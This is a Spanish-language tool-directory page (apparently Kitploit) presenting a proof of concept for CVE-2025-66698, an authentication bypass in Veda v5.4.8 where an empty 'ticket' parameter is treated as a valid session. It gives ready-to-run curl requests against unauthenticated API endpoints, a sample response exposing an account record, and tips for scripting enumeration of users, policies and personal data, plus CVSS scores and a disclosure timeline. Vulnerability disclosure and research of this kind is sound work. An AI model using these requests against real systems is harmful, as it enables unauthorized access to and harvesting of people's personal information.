Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-66698 — Prueba de concepto para CVE-2025-66698: omisión de autenticación en Veda v5.4.8 mediante parámetro ticket vacío, permitiendo la enumeración de usuarios, políticas e información personal identificable (PII) a través de endpoints de API no autenticados. | Kitploit
Herramientas/GitHubGitHub/perunchess/cve-2025-66698
ReconocimientoAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebRecopilación de InformaciónAutenticación
GitHubperunchess/cve-2025-66698

CVE-2025-66698

Prueba de concepto para CVE-2025-66698: omisión de autenticación en Veda v5.4.8 mediante parámetro ticket vacío, permitiendo la enumeración de usuarios, políticas e información personal identificable (PII) a través de endpoints de API no autenticados.

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-66698

Software objetivo: Veda (Semantic Machines) v5.4.8 (probablemente todas las versiones anteriores). Tipo de vulnerabilidad: Omisión de autenticación. ID de CVE: CVE-2025-66698. Resumen: El sistema valida incorrectamente el parámetro ticket, tratando una cadena vacía como una sesión válida. Enlace del proyecto: Veda (Semantic Machines)

18 de noviembre de 2025: Descubrimiento y solicitud inicial de CVE. 9 de enero de 2026: Asignación de ID de CVE. Se intentó contactar al proveedor (ignorado y eliminado). 13 de enero de 2026: Divulgación pública debido a la falta de respuesta del proveedor.

Esta vulnerabilidad fue encontrada durante mi investigación de seguridad al revisar el código. El parámetro ticket en el código no verifica valores vacíos.

Algunos endpoints de API afectados:

  1. curl "https://localhost/get_individual?ticket=&uri=cfg:Administrator" -k
  2. curl "https://localhost/get_membership?ticket=&uri=cfg:SuperUser" -k
  3. curl "https://localhost/is_ticket_valid?ticket=" -k (returns "true")

Hay muchos usuarios predeterminados que se pueden enumerar; también se puede cambiar el esquema: cfg a v-s, etc., para enumerar usuarios, políticas, PII (nombres completos, fotografías, títulos de trabajo, fechas de nacimiento e información de contacto), etc.

root@kitploit:~
curl "https://localhost/get_individual?ticket=&uri=cfg:VedaSystem" -k
root@kitploit:~
{"@":"cfg:VedaSystem","rdf:type":[{"data":"v-s:Person","type":"Uri"}],"rdfs:isDefinedBy":[{"data":"http://semantic-machines.com/veda/system-account","type":"Uri"}],"rdfs:label":[{"data":"Система  .","lang":"RU","type":"String"},{"data":"System  .","lang":"EN","type":"String"}],"v-s:actualVersion":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:author":[{"data":"cfg:VedaSystem","type":"Uri"}],"v-s:birthday":[{"data":"2014-03-04T20:00:00Z","type":"Datetime"}],"v-s:created":[{"data":"2025-11-18T14:49:45Z","type":"Datetime"}],"v-s:creator":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:defaultAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:edited":[{"data":"2025-11-18T17:08:59Z","type":"Datetime"}],"v-s:hasAccount":[{"data":"cfg:VedaSystemAccount","type":"Uri"}],"v-s:hasAppointment":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:hasAspect":[{"data":"cfg:VedaSystem_aspect","type":"Uri"}],"v-s:hasImage":[{"data":"v-s:DefaultPhoto","type":"Uri"}],"v-s:lastEditor":[{"data":"cfg:VedaSystemAppointment","type":"Uri"}],"v-s:lastName":[{"data":"Система","lang":"RU","type":"String"},{"data":"System","lang":"EN","type":"String"}],"v-s:parentOrganization":[{"data":"cfg:org_Veda","type":"Uri"}],"v-s:updateCounter":[{"data":93,"type":"Integer"}],"v-ui:hasPreferences":[{"data":"cfg:VedaSystem_pref","type":"Uri"}]}

Lo que se hace es encontrar cada vez más estas entidades "xxx:xxx" (cfg:xxx, v-s:xxx, etc.). Se puede escribir un script bash simple para esto. También hay un systicket codificado para lograr el mismo resultado.

Evaluación CVSS:

  • Vector CVSS 3.1: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N Puntuación: 8.6 (Alta)
  • Vector CVSS 4.0: AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N Puntuación: 9.3 (Crítica)
Descargar herramienta